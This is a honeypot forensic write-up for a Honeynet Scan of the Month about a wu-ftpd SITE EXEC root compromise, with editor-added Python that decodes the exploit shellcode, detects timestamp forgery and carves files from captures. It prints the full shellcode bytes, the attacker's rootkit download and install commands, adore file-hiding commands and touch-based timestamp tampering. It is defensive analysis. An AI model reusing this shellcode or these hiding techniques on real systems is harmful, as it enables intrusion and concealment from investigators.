Preparation:

I downloaded the file from the project.honeynet.org web site, verified its integrity and then uncompressed it:

# wget http://project.honeynet.org/scans/scan19/scan19.tar.gz
# md5 scan19.tar.gz
11e0be295d138df14111796a7733a5d2 scan19.tar.gz
# gzip -d scan19.tar.gz
# tar -xvf scan19.tar

I then created the following directories to store the output from snort:

/scan19/scans
/scan19/sessions
/scan19/syslog
/scan19/files

I ran snort twice on newdat3.log, once for session output and once for signature matches. For session output I ran snort as follows:

# snort -dr newdat3.log -c snort_session.conf -l ./scan19/sessions

For signature matches I ran snort as follows:

# snort -vdr newdat3.log -c snort_attacks.conf -l ./scan19/scans >> ./scan19/scans/attacks.txt

I ran snort once on slog2.log:

# snort -vdr slog2.log -l ./scan19/syslog >> ./scan19/syslog/syslogs.txt

Analysis:

(Note: I have only included the relevant files and directories with the analysis.)

=================================================
1. Which vulnerability did the intruder exploit?
=================================================

The attacker exploited the wu-ftpd 2.6.0 SITE EXEC vulnerability (a format string bug; the Snort rules that matched this session call it the "wu-ftpd 2.6.0 site exec overflow", see the alerts in the bonus section) to gain root access to the honeypot. This is evident from the following packet from the attacks.txt file:

09/16-19:55:59.485710 207.35.251.172:2243 -> 192.168.1.102:21
TCP TTL:48 TOS:0x0 ID:16786 IpLen:20 DgmLen:201 DF
***AP*** Seq: 0xCF78AE1C  Ack: 0xEBCE0EB9  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 237392403 29673724
31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 31 DB 43 89  1.1.1..F..1.1.C.
D9 41 B0 3F CD 80 EB 6B 5E 31 C0 31 C9 8D 5E 01  .A.?...k^1.1..^.
88 46 04 66 B9 FF 01 B0 27 CD 80 31 C0 8D 5E 01  .F.f....'..1..^.
B0 3D CD 80 31 C0 31 DB 8D 5E 08 89 43 02 31 C9  .=..1.1..^..C.1.
FE C9 31 C0 8D 5E 08 B0 0C CD 80 FE C9 75 F3 31  ..1..^.......u.1
C0 88 46 09 8D 5E 08 B0 3D CD 80 FE 0E B0 30 FE  ..F..^..=.....0.
C8 88 46 04 31 C0 88 46 07 89 76 08 89 46 0C 89  ..F.1..F..v..F..
F3 8D 4E 08 8D 56 0C B0 0B CD 80 31 C0 31 DB B0  ..N..V.....1.1..
01 CD 80 E8 90 FF FF FF 30 62 69 6E 30 73 68 31  ........0bin0sh1
2E 2E 31 31 0A                                   ..11.

According to Max Vision (http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids287&view=protocol) a packet that matches the wu-ftpd 2.6.0 exploit (arachNIDS IDS287) will have the following string at offset 0 of the TCP payload:

31c031db 31c9b046 cd80 31c031db

This is clearly evident in this packet: the payload begins with exactly those bytes. They are the start of the shellcode (xor eax,eax / xor ebx,ebx / xor ecx,ecx / mov al,0x46 / int 0x80, i.e. setreuid(0,0)), and the "0bin0sh" string at the end of the dump is the "/bin/sh" handed to execve once the code has patched the '0' bytes to '/' at run time. This is also the last FTP exploit attempted before the attacker had a remote shell on the honeypot.

=================================================================================================
2. What ways, and in what order, did the intruder use to connect and run commands on the system?
=================================================================================================

To get the commands the attacker ran once he/she was logged in I used the session output for the clear text communications. For the SSH communications I correlated the times from the snort packet captures with the syslog packet captures to find out what commands the attacker entered.

/217.156.93.66/TCP_61200_23   09/16-19:52:51.989869
===> The attacker attempted to log into the honeypot as nobody and uucp.

/207.35.251.172/TCP_2243_21   09/16-19:55:45.198773
===> The attacker starts the FTP attack.

/207.35.251.172/TCP_2243_21   09/16-19:55:59.485710
===> The packet that triggers the vulnerability and gives the attacker root access is sent (this is the packet shown in question 1; the source is 207.35.251.172, the same session as the line above). From here the attacker changes the password of the user "nobody" and creates the user "dns" that has root privileges.

/217.156.93.66/TCP_61209_23   09/16-20:13:27.206847
===> The attacker logs into the honeypot as "nobody", executes the "w" command and then logs out.

/217.156.93.66/TCP_61216_23   09/16-20:32:10.206561
===> The attacker logs into the honeypot as "nobody" and su's to "dns".
The attacker runs the following commands:

w
cd /tmp
mc -s
cd /dev/rd
ftp teleport.go.ro
mkdir sdc0
cd sdc0
ls

Once logged into the FTP server the attacker downloads the following files:

Zer0.tar.gz
copy.tar.gz
ooty.tar.gz

The attacker then uncompresses "Zer0.tar.gz" and runs the command "Go 24". The "Go" script takes one argument, in this case 24, and starts the attacker's own sshd (from ssh.tgz, see question 4) on that port. The "Go" script also installs the root kit and cleans up after itself on the compromised server.

tar zxvf Zer0.tar.gz
cd Zer0/
ls
./Go 24

/217.156.93.66/TCP_61223_24   09/16-20:51:58.559708
===> The attacker logs into the honeypot via SSH on port 24 and executes the following commands (in order):

w
whoami
cd /dev/rd/sdc0
ls
rm Zer0.tar.gz
ls
alias ls='ls --color'
ls
ls
passwd nobody
ping www.yahoo.com
pico /etc/rc.d/rc3.d/S50inet
ls
mv copy.tar.gz /usr/X11R6/bin/.,/copy/
cd /usr/X11R6/bin/.,/copy/
mv copy.tar.gz ../.
ls
cd ..
tar zxvf copy.tar.gz
chmod 7777 *
ls
rm copy.tar.gz
cd copy
chmod 7777 *
ls

/217.156.93.66/TCP_61226_24   09/16-20:59:47.852723
===> The attacker logs into the honeypot via SSH and appears to have just logged in and logged out.

/217.156.93.66/TCP_61227_23   09/16-20:59:57.150510
===> The attacker telnets into the honeypot as uucp and then logs out.

/217.156.93.66/TCP_61230_24   09/16-21:07:16.753385
===> The attacker logs into the honeypot via SSH and executes the following commands (in order):

uname -r
pstree

==================================================================
3. How did the intruder try to hide his edits from the MAC times?
==================================================================

The "Go" script first creates three directories:

mkdir -p /tmp/.dir1/
mkdir -p /tmp/.dir2/
mkdir -p /tmp/.dir3/

Then it copies the access and modification times of /bin, /usr/X11R6/bin and /etc/rc.d/rc3.d onto those directories (with touch, -r takes the times from the first path and applies them to the second; -a and -m select both timestamps and -c stops touch from creating anything):

touch -acmr /bin /tmp/.dir1
touch -acmr /usr/X11R6/bin /tmp/.dir2
touch -acmr /etc/rc.d/rc3.d /tmp/.dir3

At the end of the "Go" script, after the root kit files have been written into those directories, it sets the access and modification times of "/bin", "/usr/X11R6/bin" and "/etc/rc.d/rc3.d" back to the times saved on "/tmp/.dir1/", "/tmp/.dir2/" and "/tmp/.dir3/" respectively, so the directories look untouched:

touch -acmr /tmp/.dir1 /bin
touch -acmr /tmp/.dir2 /usr/X11R6/bin
touch -acmr /tmp/.dir3 /etc/rc.d/rc3.d

The "Go" script also changes the access and modification times of the "/etc" directory to those of the "/root" directory:

touch -acmr /root /etc

Note that touch can only set the access and modification times. The inode change time (ctime) of each of these directories is set to the current time by the touch call itself, so "ls -lc" on them still shows when the timestamps were rewritten, and a ctime much newer than the mtime is a good indicator of exactly this trick.

=========================================================================================
4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
=========================================================================================

The attacker downloaded the following files:

Zer0.tar.gz
copy.tar.gz
ooty.tar.gz

Below are the contents of the above files and a description of each:

Zer0.tar.gz
/Zer0/adore.h    #Part of the adore root kit.
/Zer0/adr.tgz    #Contents of a CVS tree for adore.
/Zer0/adr2.tgz   #Contains the four files listed below.
  ===> adore.o    #Part of the adore root kit (the kernel module).
  ===> ava        #Part of the adore root kit. This file is a compiled version of ava.c, the program used to control the module.
  ===> cleaner.o  #Part of the adore root kit.
  ===> stad       #Shell script that loads the adore.o and cleaner.o LKMs and then removes the cleaner.o LKM.
/Zer0/Go         #Shell script that installs the root kit and attempts to clean up its tracks.
/Zer0/ssh.tgz    #Contains seven files. These give the attacker an SSH session with the compromised host on whatever port the attacker wants.
/Zer0/tls.tgz    #Contains the six files below.
  ===> nscd.init  #Shell script that loads some Trojan LKMs, hides files and starts the SSH daemon.
  ===> lgstip     #Perl script.
  ===> vrssb      #Shell script that cleans logs.
  ===> patch      #Shell script that patches the system.
  ===> vrssnk     #???
  ===> vrssnf     #???

copy.tar.gz
/copy/generate       #Binary file. ???
/copy/genmass        #Binary file. ???
/copy/mj2            #Binary file. ???
/copy/mj3            #Binary file. ???
/copy/process_list   #Executable that takes the wu-scan.log file as input and creates the file ips.wu
/copy/root_them      #Bash shell script that runs the process_list command and then runs the xploit utility against all of the IPs parsed from the ips.wu file.
/copy/ssh            #SSH client ???
/copy/suu.tgz        #???
/copy/wu-scan        #Compiled version of wu-scan.c from Narrow. This generates the wu-scan.log file that the process_list utility takes as input.
/copy/zxploit        #Compiled version of 7350wu.c from Team Teso. This is a mass rooting utility.
/copy/smrf/smrf5     #Compiled version of smurf.c v5.0 from TFreak.
/copy/smrf/smurf.ips #List of IP addresses that are smurfable.

ooty.tar.gz
/ooty/none~!bighole  #???
/ooty/flare          #A suid Perl script.
/ooty/bighole.c      #C source.
/ooty/Cr0n           #ASCII text file. ???
/ooty/bindpar.x      #Shell script.
/ooty/prlnz.sh       #Shell script. This attempts to exploit procmail and sendmail locally.
/ooty/mail.x         #Shell script. This attempts to exploit sendmail locally.
/ooty/perl.x         #Shell script. This attempts to exploit suidperl locally.
/ooty/motd           #ASCII file that is filled with "You were hacked, you should really learn more about security"
/ooty/sush           #Binary file. ???
/ooty/bighole        #Binary file. ???
/ooty/crontab.x      #Binary file. ???
/ooty/kernel.x       #Binary file. ???

Some of the files were part of existing rootkits and other exploit utilities. I was unable to identify some of the files, so I was not able to determine whether they were custom code or utilities that already existed.

================================================================================
5. Recover (tell how you did it too) the rootkits from the snort binary capture.
================================================================================

1. I opened the snort binary file in EtherPeek and filtered it for FTP only.
2. I filtered the FTP sessions by TCP conversation and saved them off in three different files (Zer0.dmp == Zer0.tar.gz, copy.dmp == copy.tar.gz, ooty.dmp == ooty.tar.gz).
3. I opened each of the saved FTP sessions individually with Ethereal, right clicked on the first packet and chose "Follow TCP Stream". This opened another window with the binary data in it.
4. I then chose "Save As" and saved them with the appropriate file names.

(Each tarball travels on its own FTP data connection, separate from the port 21 control connection, which carries only the commands; that is why one TCP conversation holds exactly one file. A saved stream should start with the gzip magic bytes 1f 8b, and "gzip -t" on it confirms nothing was lost in the capture.)

================================================================================
6. What does the rootkit do to hide the presence of the attacker on the system?
================================================================================

In lines 183-188 of the "Go" script the following files and directories are hidden with "ava", adore's control program (the "h" command tells the kernel module to hide the path):

./ava h /usr/X11R6/bin/.,
./ava h /usr/info/.t0rn
./ava h /dev/rd/sdc0
./ava h /dev/rd/nscd.init
./ava h /etc/rc.d/rc3.d/S50inet
./ava h /usr/X11R6/lib/X11/.~

Also, the fact that a sniffer is running in promiscuous mode is not apparent to the administrator of the compromised system because of the adore root kit. Part of the "Go" script modifies the MAC times of directories (see question 3) and removes certain entries from log files.

==========================================
7. What did you learn from this exercise?
==========================================

Most attackers only use tools or utilities that others create. Sometimes attackers don't really know what they are doing when they run these scripts. They rely on the knowledge of other hackers to properly write the utilities. I am not sure why the attacker was using two separate systems for the attack.
The attacker used one system (207.35.251.172) to actually run the exploit and another system (217.156.93.66) to log into the honeypot before the exploit was run, to see if the honeypot had already been compromised, and to log into the honeypot after the exploit was run to execute more commands.

=========================================
8. How long did this challenge take you?
=========================================

This scan of the month took me about 10 hours. The time was split about equally between the information gathering and the actual write-up.

===============================================================================
Bonus Question: Based on this challenge, write an example letter of notification to the source that attacked the system. Include any evidence logs that you feel are important.
===============================================================================

To Philippe Daoust,

On September 16, 2001 at approximately 19:55 an IP address (207.35.251.172) that is under your control attacked and gained "root" level access to one of our FTP servers. Below are some IDS logs showing the attack. If you need any more information or further assistance please let me know.

Thank you for your cooperation.
Neil

[**] [1:346:1] FTP EXPLOIT wu-ftpd 2.6.0 site exec overflow [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 10]
09/16-19:55:57.885306 207.35.251.172:2243 -> 192.168.1.102:21
TCP TTL:48 TOS:0x0 ID:16774 IpLen:20 DgmLen:563 DF
***AP*** Seq: 0xCF78A695  Ack: 0xEBCDFDB2  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 237392242 29673673
[Xref => http://www.whitehats.com/info/IDS286]

[**] [1:346:1] FTP EXPLOIT wu-ftpd 2.6.0 site exec overflow [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 10]
09/16-19:55:58.054295 207.35.251.172:2243 -> 192.168.1.102:21
TCP TTL:48 TOS:0x0 ID:16777 IpLen:20 DgmLen:489 DF
***AP*** Seq: 0xCF78A894  Ack: 0xEBCE0281  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 237392259 29673688
[Xref => http://www.whitehats.com/info/IDS286]

[**] [1:361:2] FTP site exec [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
09/16-19:55:58.209849 207.35.251.172:2243 -> 192.168.1.102:21
TCP TTL:48 TOS:0x0 ID:16780 IpLen:20 DgmLen:520 DF
***AP*** Seq: 0xCF78AA49  Ack: 0xEBCE067C  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 237392274 29673702
[Xref => http://www.securityfocus.com/bid/2241] [Xref => http://www.whitehats.com/info/IDS317]

[**] [1:361:2] FTP site exec [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
09/16-19:55:58.372588 207.35.251.172:2243 -> 192.168.1.102:21
TCP TTL:48 TOS:0x0 ID:16783 IpLen:20 DgmLen:563 DF
***AP*** Seq: 0xCF78AC1D  Ack: 0xEBCE0AD8  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 237392290 29673715
[Xref => http://www.securityfocus.com/bid/2241] [Xref => http://www.whitehats.com/info/IDS317]

[**] [1:344:1] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 10]
09/16-19:55:59.485710 207.35.251.172:2243 -> 192.168.1.102:21
TCP TTL:48 TOS:0x0 ID:16786 IpLen:20 DgmLen:201 DF
***AP*** Seq: 0xCF78AE1C  Ack: 0xEBCE0EB9  Win: 0x7C70  TcpLen: 32
TCP Options (3) => NOP NOP TS: 237392403 29673724
[Xref => http://www.whitehats.com/info/IDS287]
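Worked example for question 1 (added here by the editor; it is not part of the original write-up or of any Honeynet tool): the script below parses the Snort hex dump of the 19:55:59.485710 packet back into bytes, checks the arachNIDS IDS287 byte string at payload offset 0, and walks the shellcode for "mov al, N; int 0x80" pairs to recover the syscall sequence. The dump is copied from the packet above; the syscall numbers are the standard Linux/x86 ones, and the run-time patching of the trailing "0bin0sh1..11" string is reproduced from the disassembly.

```python
# Added example (not part of the original write-up): decode the wu-ftpd
# shellcode from the Snort hex dump in question 1. The dump is copied from
# that packet; the syscall table is the standard Linux/x86 one.
import re

# The 149-byte TCP payload of the 09/16-19:55:59.485710 packet, as Snort -d
# printed it (16 hex bytes per line followed by an ASCII column).
SNORT_DUMP = """\
31 C0 31 DB 31 C9 B0 46 CD 80 31 C0 31 DB 43 89  1.1.1..F..1.1.C.
D9 41 B0 3F CD 80 EB 6B 5E 31 C0 31 C9 8D 5E 01  .A.?...k^1.1..^.
88 46 04 66 B9 FF 01 B0 27 CD 80 31 C0 8D 5E 01  .F.f....'..1..^.
B0 3D CD 80 31 C0 31 DB 8D 5E 08 89 43 02 31 C9  .=..1.1..^..C.1.
FE C9 31 C0 8D 5E 08 B0 0C CD 80 FE C9 75 F3 31  ..1..^.......u.1
C0 88 46 09 8D 5E 08 B0 3D CD 80 FE 0E B0 30 FE  ..F..^..=.....0.
C8 88 46 04 31 C0 88 46 07 89 76 08 89 46 0C 89  ..F.1..F..v..F..
F3 8D 4E 08 8D 56 0C B0 0B CD 80 31 C0 31 DB B0  ..N..V.....1.1..
01 CD 80 E8 90 FF FF FF 30 62 69 6E 30 73 68 31  ........0bin0sh1
2E 2E 31 31 0A                                   ..11.
"""

# arachNIDS IDS287: this byte string at payload offset 0 identifies the exploit.
IDS287_PREFIX = bytes.fromhex("31c031db31c9b046cd8031c031db")

# Linux/x86 syscall numbers the shellcode loads into AL before int 0x80.
SYSCALLS = {1: "exit", 11: "execve", 12: "chdir", 39: "mkdir",
            61: "chroot", 63: "dup2", 70: "setreuid"}

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")


def parse_snort_dump(dump):
    """Turn Snort's '<up to 16 hex bytes> <ascii>' lines back into raw bytes.

    Tokens are consumed from the left until the first non-hex token or the
    17th token, so an ASCII column that happens to look like hex is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split()[:16]:
            if not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def matches_ids287(payload):
    """arachNIDS anchors the signature at offset 0, not anywhere in the payload."""
    return payload.startswith(IDS287_PREFIX)


def syscall_sequence(code):
    """List the syscalls in code order by spotting 'mov al, imm8' (B0 xx)
    immediately followed by 'int 0x80' (CD 80)."""
    calls = []
    for i in range(len(code) - 3):
        if code[i] == 0xB0 and code[i + 2:i + 4] == b"\xcd\x80":
            calls.append(SYSCALLS.get(code[i + 1], "sys_%d" % code[i + 1]))
    return calls


def patched_strings(code):
    """Reproduce the run-time patching the code does on its trailing data
    '0bin0sh1..11' (reached by the CALL/POP trick): NUL-terminate 'bin' for
    mkdir/chroot, '..' for the 255 x chdir loop that walks out of the FTP
    chroot, then turn the 0s into '/' and NUL-terminate for execve."""
    data = bytearray(code[code.rindex(b"\xe8") + 5:])   # bytes after the backward CALL
    data[4] = 0                                  # mov [esi+4], al (al=0)
    mkdir_arg = bytes(data[1:4]).decode()        # "bin"
    data[10] = 0                                 # mov [ebx+2], eax with ebx=esi+8
    chdir_arg = bytes(data[8:10]).decode()       # ".."
    data[0] = data[4] = ord("/")                 # dec byte [esi]; mov [esi+4], '/'
    data[7] = 0                                  # mov [esi+7], al (al=0)
    execve_arg = bytes(data[:7]).decode()        # "/bin/sh"
    return {"mkdir": mkdir_arg, "chdir": chdir_arg, "execve": execve_arg}


if __name__ == "__main__":
    payload = parse_snort_dump(SNORT_DUMP)
    print("%d bytes, IDS287 match: %s" % (len(payload), matches_ids287(payload)))
    print("syscalls:", " -> ".join(syscall_sequence(payload)))
    print("strings:", patched_strings(payload))
```

The recovered sequence (setreuid, dup2, mkdir, chroot, chdir, chroot, execve, exit) is the classic chroot escape: anonymous wu-ftpd runs chrooted, so the code makes a directory, chroots into it, climbs out with 255 chdir("..") calls, chroots to "." and only then executes /bin/sh with stderr joined to the control socket. The 149-byte length matches DgmLen 201 minus the 20-byte IP and 32-byte TCP headers.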
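Worked example for question 3 (added here by the editor; it is not from the original write-up or from the attacker's Go script): the script reproduces the touch -acmr save/restore sequence against a scratch directory using os.utime, which is the same system call touch uses, and then runs the ctime check described above. It assumes Linux/POSIX semantics for st_ctime; the directory names and the "2001" timestamp are constructed stand-ins, not values from the capture.

```python
# Added example (not from the original write-up or from the Go script):
# reproduce the touch -acmr save/restore trick from question 3 in a scratch
# directory and show that the inode change time (ctime) still exposes it.
# Assumes Linux/POSIX st_ctime semantics; the paths and the "old" timestamp
# are constructed stand-ins.
import os
import shutil
import tempfile


def save_times(ref, stash):
    """touch -acmr REF STASH: copy REF's atime and mtime onto STASH."""
    st = os.stat(ref)
    os.utime(stash, ns=(st.st_atime_ns, st.st_mtime_ns))


def restore_times(stash, target):
    """touch -acmr STASH TARGET: put the stashed atime and mtime back on TARGET."""
    save_times(stash, target)


def install_trojan(bindir):
    """Stand-in for the rootkit dropping a binary: adding an entry bumps the
    directory's mtime and ctime to 'now'."""
    with open(os.path.join(bindir, "ls"), "wb") as f:
        f.write(b"placeholder, not a real trojan\n")


def mac_anomaly(path, tolerance=60.0):
    """Detection check: utime()/touch cannot set ctime, so a ctime more than
    `tolerance` seconds newer than mtime means the timestamps were rewritten
    after the last real change. chmod/chown produce the same pattern, so
    treat a hit as a lead to examine, not as proof."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > tolerance


def demo():
    """Run the Go script's sequence against a fake /bin and report what an
    investigator would see afterwards."""
    work = tempfile.mkdtemp()
    try:
        bindir = os.path.join(work, "bin")
        stash = os.path.join(work, "tmp", ".dir1")
        os.makedirs(bindir)
        os.makedirs(stash)
        # Give the fake /bin a believable old mtime (constructed value,
        # 2001-09-02 00:00:00 UTC), as an installed system would have.
        old = 999388800
        os.utime(bindir, (old, old))

        save_times(bindir, stash)              # touch -acmr /bin /tmp/.dir1
        install_trojan(bindir)                 # rootkit writes into /bin
        mtime_during = os.stat(bindir).st_mtime
        restore_times(stash, bindir)           # touch -acmr /tmp/.dir1 /bin

        st = os.stat(bindir)
        return {
            "mtime_moved_during_install": mtime_during > old,
            "mtime_restored": int(st.st_mtime) == old,
            "flagged": mac_anomaly(bindir),        # ctime is 'now', mtime is 2001
            "control_flagged": mac_anomaly(work),  # untouched dir: ctime ~ mtime
        }
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-28s %s" % (k, v))
```

On a real system the same check is "find / -type d -cnewer <reference> -exec ls -ldc {} \;" or comparing the %Y and %Z fields of stat across the directories the Go script touches; here the fake /bin ends up with its 2001 mtime restored but a ctime of right now, and the untouched control directory does not trip the check.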
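Worked example for question 5 (added here by the editor; it is not part of the original write-up and does not use EtherPeek or Ethereal): a standard-library Python equivalent of "Follow TCP Stream" that reads a libpcap file, keeps one direction of one connection, orders the payload by sequence number and discards retransmitted bytes. Because the Honeynet capture is not embedded here, the script builds its own small capture in memory: a gzip file split over three segments that arrive out of order with one retransmission, plus an unrelated FTP control packet. The FTP server address 10.0.0.5 and the port numbers are placeholders.

```python
# Added example (not part of the original write-up): a standard-library
# version of the EtherPeek/Ethereal "Follow TCP Stream" carving from
# question 5. The capture it runs on is built in memory here; it is not the
# Honeynet capture, and the FTP server address 10.0.0.5 is a placeholder.
import gzip
import random
import socket
import struct

# libpcap global header: magic, version 2.4, tz 0, sigfigs 0, snaplen, LINKTYPE_ETHERNET
PCAP_GLOBAL = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)


def make_frame(src, sport, dst, dport, seq, payload, flags=0x18):
    """Ethernet + IPv4 + TCP frame. Checksums stay zero; the carver never checks them."""
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 1,
                     0x4000, 64, 6, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Wrap frames in a libpcap file (timestamps zero; the carver ignores them)."""
    out = bytearray(PCAP_GLOBAL)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return bytes(out)


def tcp_segments(pcap):
    """Yield (flow, seq, payload) for every TCP segment carrying data.
    flow is (src, sport, dst, dport), i.e. one direction of a connection."""
    magic, = struct.unpack_from("<I", pcap)
    endian = "<" if magic == 0xA1B2C3D4 else ">"   # microsecond magic, either byte order
    off = 24
    while off + 16 <= len(pcap):
        caplen = struct.unpack_from(endian + "IIII", pcap, off)[2]
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if frame[12:14] != b"\x08\x00":            # not IPv4
            continue
        ip = frame[14:]
        if ip[9] != 6:                             # not TCP
            continue
        ihl = (ip[0] & 0x0F) * 4
        tcp = ip[ihl:struct.unpack_from("!H", ip, 2)[0]]
        sport, dport, seq = struct.unpack_from("!HHI", tcp)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            flow = (socket.inet_ntoa(ip[12:16]), sport, socket.inet_ntoa(ip[16:20]), dport)
            yield flow, seq, payload


def follow_stream(pcap, flow):
    """Reassemble one direction of one connection: sort by sequence number,
    keep the first copy of every byte (retransmissions and overlaps are
    dropped) and zero-fill any hole the sniffer missed so later offsets stay
    right. Sequence-number wraparound is not handled."""
    segs = sorted((seq, data) for f, seq, data in tcp_segments(pcap) if f == flow)
    stream = bytearray()
    next_seq = segs[0][0] if segs else 0
    for seq, data in segs:
        end = seq + len(data)
        if end <= next_seq:
            continue                              # pure retransmission
        if seq < next_seq:
            data = data[next_seq - seq:]          # overlapping retransmission
        elif seq > next_seq:
            stream += b"\x00" * (seq - next_seq)  # hole in the capture
        stream += data
        next_seq = end
    return bytes(stream)


def demo():
    """Carve a 'Zer0.tar.gz' stand-in from a constructed capture and check it is intact."""
    body = bytes(random.Random(19).getrandbits(8) for _ in range(900))   # constructed content
    original = gzip.compress(body)
    a, b, c = original[:100], original[100:300], original[300:]
    ftp_server, honeypot, isn = "10.0.0.5", "192.168.1.102", 0x10000000
    frames = [
        make_frame(honeypot, 1030, ftp_server, 21, 1, b"RETR Zer0.tar.gz\r\n"),  # control channel
        make_frame(ftp_server, 20, honeypot, 1031, isn + 100, b),   # arrives out of order
        make_frame(ftp_server, 20, honeypot, 1031, isn, a),
        make_frame(ftp_server, 20, honeypot, 1031, isn + 100, b),   # retransmission
        make_frame(ftp_server, 20, honeypot, 1031, isn + 300, c),
    ]
    carved = follow_stream(build_pcap(frames), (ftp_server, 20, honeypot, 1031))
    return {"original": original, "carved": carved,
            "intact": carved[:2] == b"\x1f\x8b" and gzip.decompress(carved) == body}


if __name__ == "__main__":
    r = demo()
    print("carved %d bytes, intact: %s" % (len(r["carved"]), r["intact"]))
```

Against the real newdat3.log you would run tcp_segments over the file, pick the three server-to-honeypot data flows that start with 1f 8b, and write each follow_stream result to Zer0.tar.gz, copy.tar.gz and ooty.tar.gz; the zero-fill for holes is deliberate so that a dropped packet shows up as a gzip CRC failure rather than a silently shorter file.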